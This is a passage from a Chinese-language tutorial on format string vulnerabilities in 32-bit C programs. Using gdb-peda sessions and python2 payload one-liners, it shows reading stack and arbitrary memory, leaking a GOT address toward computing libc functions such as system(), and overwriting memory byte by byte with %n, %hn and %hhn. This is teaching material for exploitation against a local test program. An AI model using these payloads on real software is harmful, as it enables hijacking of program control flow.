=> 0x56555642 <main+133>:       call   0x56555430 <printf@plt>
   0x56555647 <main+138>:       add    esp,0x20
   0x5655564a <main+141>:       sub    esp,0xc
   0x5655564d <main+144>:       push   0xa
   0x5655564f <main+146>:       call   0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>:     add    ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()

格式字符串的地址在 0xffffd584，从下面的输出中可以看到它们在栈中是怎样排布的：

gdb-peda$ x/20w $esp
0xffffd550:     0xffffd584      0x00000001      0x88888888      0xffffffff
0xffffd560:     0xffffd57a      0xffffd584      0x56555220      0x565555d7
0xffffd570:     0xf7ffda54      0x00000001      0x424135d0      0x00004443
0xffffd580:     0x00000000      0x41414141      0x2e70252e      0x252e7025
0xffffd590:     0x70252e70      0x2e70252e      0x252e7025      0x70252e70
gdb-peda$ x/20wb 0xffffd584
0xffffd584:     0x41    0x41    0x41    0x41    0x2e    0x25    0x70    0x2e
0xffffd58c:     0x25    0x70    0x2e    0x25    0x70    0x2e    0x25    0x70
0xffffd594:     0x2e    0x25    0x70    0x2e
gdb-peda$ python print('\x2e\x25\x70')
.%p

下面是程序运行的结果：

gdb-peda$ c
Continuing.
AAAA.0x1.0x88888888.0xffffffff.0xffffd57a.0xffffd584.0x56555220.0x565555d7.0xf7ffda54.0x1.0x424135d0.0x4443.(nil).0x41414141.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e

0x41414141 是输出的第 13 个字符，所以我们使用 %13$s 即可读出 0x41414141 处的内容，当然，这里可能是一个不合法的地址。下面我们把 0x41414141 换成我们需要的合法的地址，比如字符串 ABCD 的地址 0xffffd57a：

$ python2 -c 'print("\x7a\xd5\xff\xff"+".%13$s")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 --> 0xffffd57a ("ABCD")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd54c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd54c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd550 --> 0xffffd584 --> 0xffffd57a ("ABCD")
0008| 0xffffd554 --> 0x1
0012| 0xffffd558 --> 0x88888888
0016| 0xffffd55c --> 0xffffffff
0020| 0xffffd560 --> 0xffffd57a ("ABCD")
0024| 0xffffd564 --> 0xffffd584 --> 0xffffd57a ("ABCD")
0028| 0xffffd568 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20w $esp
0xffffd54c:     0x08048520      0xffffd584      0x00000001      0x88888888
0xffffd55c:     0xffffffff      0xffffd57a      0xffffd584      0x080481fc
0xffffd56c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd57c:     0x00004443      0x00000000      0xffffd57a      0x3331252e
0xffffd58c:     0x00007324      0xffffd5ca      0x00000001      0x000000c2
gdb-peda$ x/s 0xffffd57a
0xffffd57a:     "ABCD"
gdb-peda$ c
Continuing.
z���.ABCD

当然这也没有什么用，我们真正经常用到的地方是，把程序中某函数的 GOT 地址传进去，然后获得该地址所对应的函数的虚拟地址。然后根据函数在 libc 中的相对位置，计算出我们需要的函数地址（如 system()）。如下面展示的这样：

先看一下重定向表：

$ readelf -r a.out

Relocation section '.rel.dyn' at offset 0x2e8 contains 1 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000206 R_386_GLOB_DAT    00000000   __gmon_start__

Relocation section '.rel.plt' at offset 0x2f0 contains 4 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf@GLIBC_2.0
0804a010  00000307 R_386_JUMP_SLOT   00000000   __libc_start_main@GLIBC_2.0
0804a014  00000407 R_386_JUMP_SLOT   00000000   putchar@GLIBC_2.0
0804a018  00000507 R_386_JUMP_SLOT   00000000   __isoc99_scanf@GLIBC_2.7

.rel.plt 中有四个函数可供我们选择，按理说选择任意一个都没有问题，但是在实践中我们会发现一些问题。下面的结果分别是 printf、__libc_start_main、putchar 和 __isoc99_scanf：

$ python2 -c 'print("\x0c\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffe22cfa.0xffe22d04.0x80481fc.0x80484b0.0xf77afa54.0x1.0x424155d0.0x4443.(nil).0x2e0804a0.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025
$ python2 -c 'print("\x10\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffd439ba.0xffd439c4.0x80481fc.0x80484b0.0xf77b6a54.0x1.0x4241c5d0.0x4443.(nil).0x804a010.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
$ python2 -c 'print("\x14\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffcc17aa.0xffcc17b4.0x80481fc.0x80484b0.0xf7746a54.0x1.0x4241c5d0.0x4443.(nil).0x804a014.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
$ python2 -c 'print("\x18\xa0\x04\x08"+".%p"*20)' | ./a.out
▒.0x1.0x88888888.0xffffffff.0xffcb99aa.0xffcb99b4.0x80481fc.0x80484b0.0xf775ca54.0x1.0x424125d0.0x4443.(nil).0x804a018.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e

细心一点你就会发现第一个（printf）的结果有问题。我们输入了 \x0c\xa0\x04\x08（0x0804a00c），可是 13 号位置输出的结果却是 0x2e0804a0，那么，\x0c 哪去了，查了一下 ASCII 表：

Oct   Dec   Hex   Char
──────────────────────────────────────
014   12    0C    FF  '\f' (form feed)

于是就被省略了，同样会被省略的还有很多，如 \x07（'\a'）、\x08（'\b'）、\x20（SPACE）等的不可见字符都会被省略。这就会让我们后续的操作出现问题。所以这里我们选用最后一个（__isoc99_scanf）。

$ python2 -c 'print("\x18\xa0\x04\x08"+"%13$s")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push   ebp)
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd54c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd54c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd550 --> 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push   ebp)
0008| 0xffffd554 --> 0x1
0012| 0xffffd558 --> 0x88888888
0016| 0xffffd55c --> 0xffffffff
0020| 0xffffd560 --> 0xffffd57a ("ABCD")
0024| 0xffffd564 --> 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push   ebp)
0028| 0xffffd568 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20w $esp
0xffffd54c:     0x08048520      0xffffd584      0x00000001      0x88888888
0xffffd55c:     0xffffffff      0xffffd57a      0xffffd584      0x080481fc
0xffffd56c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd57c:     0x00004443      0x00000000      0x0804a018      0x24333125
0xffffd58c:     0x00f00073      0xffffd5ca      0x00000001      0x000000c2
gdb-peda$ x/w 0x804a018
0x804a018:      0xf7e3a790
gdb-peda$ c
Continuing.
▒����

虽然我们可以通过 x/w 指令得到 __isoc99_scanf 函数的虚拟地址 0xf7e3a790。但是由于 0x804a018 处的内容是仍然一个指针，使用 %13$s 打印并不成功。在下面的内容中将会介绍怎样借助 pwntools 的力量，来获得正确格式的虚拟地址，并能够对它有进一步的利用。

当然并非总能通过使用 4 字节的跳转（如 AAAA）来步进参数指针去引用格式字符串的起始部分，有时，需要在格式字符串之前加一个、两个或三个字符的前缀来实现一系列的４字节跳转。

覆盖栈内容

现在我们已经可以读取栈上和任意地址的内存了，接下来我们更进一步，通过修改栈和内存来劫持程序的执行流程。%n 转换指示符将 %n 当前已经成功写入流或缓冲区中的字符个数存储到地址由参数指定的整数中。

#include<stdio.h>
void main() {
    int i;
    char str[] = "hello";

    printf("%s %n\n", str, &i);
    printf("%d\n", i);
}
$ ./a.out
hello
6

i 被赋值为 6，因为在遇到转换指示符之前一共写入了 6 个字符（hello 加上一个空格）。在没有长度修饰符时，默认写入一个 int 类型的值。

通常情况下，我们要需要覆写的值是一个 shellcode 的地址，而这个地址往往是一个很大的数字。这时我们就需要通过使用具体的宽度或精度的转换规范来控制写入的字符个数，即在格式字符串中加上一个十进制整数来表示输出的最小位数，如果实际位数大于定义的宽度，则按实际位数输出，反之则以空格或 0 补齐（0 补齐时在宽度前加点. 或 0）。如：

#include<stdio.h>
void main() {
    int i;

    printf("%10u%n\n", 1, &i);
    printf("%d\n", i);
    printf("%.50u%n\n", 1, &i);
    printf("%d\n", i);
    printf("%0100u%n\n", 1, &i);
    printf("%d\n", i);
}
$ ./a.out
         1
10
00000000000000000000000000000000000000000000000001
50
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001
100

就是这样，下面我们把地址 0x8048000 写入内存：

printf("%0134512640d%n\n", 1, &i);
$ ./a.out
...
0x8048000

还是我们一开始的程序，我们尝试将 arg2 的值更改为任意值（比如 0x00000020，十进制 32），在 gdb 中可以看到得到 arg2 的地址 0xffffd538，那么我们构造格式字符串 \x38\xd5\xff\xff%08x%08x%012d%13$n，其中 \x38\xd5\xff\xff 表示 arg2 的地址，占 4 字节，%08x%08x 表示两个 8 字符宽的十六进制数，占 16 字节，%012d 占 12 字节，三个部分加起来就占了 4+16+12=32 字节，即把 arg2 赋值为 0x00000020。格式字符串最后一部分 %13$n 也是最重要的一部分，和上面的内容一样，表示格式字符串的第 13 个参数，即写入 0xffffd538 的地方（0xffffd564），printf() 就是通过这个地址找到被覆盖的内容的：

$ python2 -c 'print("\x38\xd5\xff\xff%08x%08x%012d%13$n")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf  
Breakpoint 1 at 0x8048350
gdb-peda$ r < text  
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c:     0x08048520      0xffffd564      0x00000001      0x88888888
0xffffd53c:     0xffffffff      0xffffd55a      0xffffd564      0x080481fc
0xffffd54c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd55c:     0x00004443      0x00000000      0xffffd538      0x78383025
0xffffd56c:     0x78383025      0x32313025      0x33312564      0x00006e24
gdb-peda$ finish
Run till exit from #0  0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x20 (' ')
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
EIP: 0x8048520 (<main+138>:     add    esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048514 <main+126>:        lea    eax,[ebp-0x94]
   0x804851a <main+132>:        push   eax
   0x804851b <main+133>:        call   0x8048350 <printf@plt>
=> 0x8048520 <main+138>:        add    esp,0x20
   0x8048523 <main+141>:        sub    esp,0xc
   0x8048526 <main+144>:        push   0xa
   0x8048528 <main+146>:        call   0x8048370 <putchar@plt>
   0x804852d <main+151>:        add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x20 (' ')
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>:      add    ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530:     0xffffd564      0x00000001      0x00000020      0xffffffff
0xffffd540:     0xffffd55a      0xffffd564      0x080481fc      0x080484b0
0xffffd550:     0xf7ffda54      0x00000001      0x424135d0      0x00004443
0xffffd560:     0x00000000      0xffffd538      0x78383025      0x78383025
0xffffd570:     0x32313025      0x33312564      0x00006e24      0xf7e70240

对比 printf() 函数执行前后的输出，printf 首先解析 %13$n 找到获得地址 0xffffd564 的值 0xffffd538，然后跳转到地址 0xffffd538，将它的值 0x88888888 覆盖为 0x00000020，就得到 arg2=0x00000020。

覆盖任意地址内存

也许已经有人发现了一个问题，使用上面覆盖内存的方法，值最小只能是 4，因为单单地址就占去了 4 个字节。那么我们怎样覆盖比 4 小的值呢。利用整数溢出是一个方法，但是在实践中这样做基本都不会成功。再想一下，前面的输入中，地址都位于格式字符串之前，这样做真的有必要吗，能否将地址放在中间。我们来试一下，使用格式字符串 "AA%15$nA"+"\x38\xd5\xff\xff"，开头的 AA 占两个字节，即将地址赋值为 2，中间是 %15$n 占 5 个字节，这里不是 %13$n，因为地址被我们放在了后面，在格式字符串的第 15 个参数，后面跟上一个 A 占用一个字节。于是前半部分总共占用了 2+5+1=8 个字节，刚好是两个参数的宽度，这里的 8 字节对齐十分重要。最后再输入我们要覆盖的地址 \x38\xd5\xff\xff，详细输出如下：

$ python2 -c 'print("AA%15$nA"+"\x38\xd5\xff\xff")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf  
Breakpoint 1 at 0x8048350
gdb-peda$ r < text  
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 ("AA%15$nA8\325\377\377")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c:     0x08048520      0xffffd564      0x00000001      0x88888888
0xffffd53c:     0xffffffff      0xffffd55a      0xffffd564      0x080481fc
0xffffd54c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd55c:     0x00004443      0x00000000      0x31254141      0x416e2435
0xffffd56c:     0xffffd538      0xffffd500      0x00000001      0x000000c2
gdb-peda$ finish
Run till exit from #0  0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x7
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
EIP: 0x8048520 (<main+138>:     add    esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048514 <main+126>:        lea    eax,[ebp-0x94]
   0x804851a <main+132>:        push   eax
   0x804851b <main+133>:        call   0x8048350 <printf@plt>
=> 0x8048520 <main+138>:        add    esp,0x20
   0x8048523 <main+141>:        sub    esp,0xc
   0x8048526 <main+144>:        push   0xa
   0x8048528 <main+146>:        call   0x8048370 <putchar@plt>
   0x804852d <main+151>:        add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x2
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>:      add    ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530:     0xffffd564      0x00000001      0x00000002      0xffffffff
0xffffd540:     0xffffd55a      0xffffd564      0x080481fc      0x080484b0
0xffffd550:     0xf7ffda54      0x00000001      0x424135d0      0x00004443
0xffffd560:     0x00000000      0x31254141      0x416e2435      0xffffd538
0xffffd570:     0xffffd500      0x00000001      0x000000c2      0xf7e70240

对比 printf() 函数执行前后的输出，可以看到我们成功地给 arg2 赋值了 0x00000002。

说完了数字小于 4 时的覆盖，接下来说说大数字的覆盖。前面的方法教我们直接输入一个地址的十进制就可以进行赋值，可是，这样占用的内存空间太大，往往会覆盖掉其他重要的地址而产生错误。其实我们可以通过长度修饰符来更改写入的值的大小：

char c;
short s;
int i;
long l;
long long ll;

printf("%s %hhn\n", str, &c);       // 写入单字节
printf("%s %hn\n", str, &s);        // 写入双字节
printf("%s %n\n", str, &i);         // 写入4字节
printf("%s %ln\n", str, &l);        // 写入8字节
printf("%s %lln\n", str, &ll);      // 写入16字节

试一下：

$ python2 -c 'print("A%15$hhn"+"\x38\xd5\xff\xff")' > text
0xffffd530:     0xffffd564      0x00000001      0x88888801      0xffffffff

$ python2 -c 'print("A%15$hnA"+"\x38\xd5\xff\xff")' > text
0xffffd530:     0xffffd564      0x00000001      0x88880001      0xffffffff

$ python2 -c 'print("A%15$nAA"+"\x38\xd5\xff\xff")' > text
0xffffd530:     0xffffd564      0x00000001      0x00000001      0xffffffff

于是，我们就可以逐字节地覆盖，从而大大节省了内存空间。这里我们尝试写入 0x12345678 到地址 0xffffd538，首先使用 AAAABBBBCCCCDDDD 作为输入：

gdb-peda$ r
AAAABBBBCCCCDDDD
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 ("AAAABBBBCCCCDDDD")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd530 --> 0xffffd564 ("AAAABBBBCCCCDDDD")
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 ("AAAABBBBCCCCDDDD")
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c:     0x08048520      0xffffd564      0x00000001      0x88888888
0xffffd53c:     0xffffffff      0xffffd55a      0xffffd564      0x080481fc
0xffffd54c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd55c:     0x00004443      0x00000000      0x41414141      0x42424242
0xffffd56c:     0x43434343      0x44444444      0x00000000      0x000000c2
gdb-peda$ x/4wb 0xffffd538
0xffffd538:     0x88    0x88    0x88    0x88

由于我们想要逐字节覆盖，就需要 4 个用于跳转的地址，4 个写入地址和 4 个值，对应关系如下（小端序）：

0xffffd564 -> 0x41414141 (0xffffd538) -> \x78
0xffffd568 -> 0x42424242 (0xffffd539) -> \x56
0xffffd56c -> 0x43434343 (0xffffd53a) -> \x34
0xffffd570 -> 0x44444444 (0xffffd53b) -> \x12

把 AAAA、BBBB、CCCC、DDDD 占据的地址分别替换成括号中的值，再适当使用填充字节使 8 字节对齐就可以了。构造输入如下：

$ python2 -c 'print("\x38\xd5\xff\xff"+"\x39\xd5\xff\xff"+"\x3a\xd5\xff\xff"+"\x3b\xd5\xff\xff"+"%104c%13$hhn"+"%222c%14$hhn"+"%222c%15$hhn"+"%222c%16$hhn")' > text

其中前四个部分是 4 个写入地址，占 4*4=16 字节，后面四个部分分别用于写入十六进制数，由于使用了 hh，所以只会保留一个字节 0x78（16+104=120 -> 0x78）、0x56（120+222=342 -> 0x0156 -> 0x56）、0x34（342+222=564 -> 0x0234 -> 0x34）、0x12（564+222=786 -> 0x312 -> 0x12）。执行结果如下：

$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf  
Breakpoint 1 at 0x8048350
gdb-peda$ r < text  
Starting program: /home/firmy/Desktop/RE4B/a.out < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp  
0xffffd52c:     0x08048520      0xffffd564      0x00000001      0x88888888
0xffffd53c:     0xffffffff      0xffffd55a      0xffffd564      0x080481fc
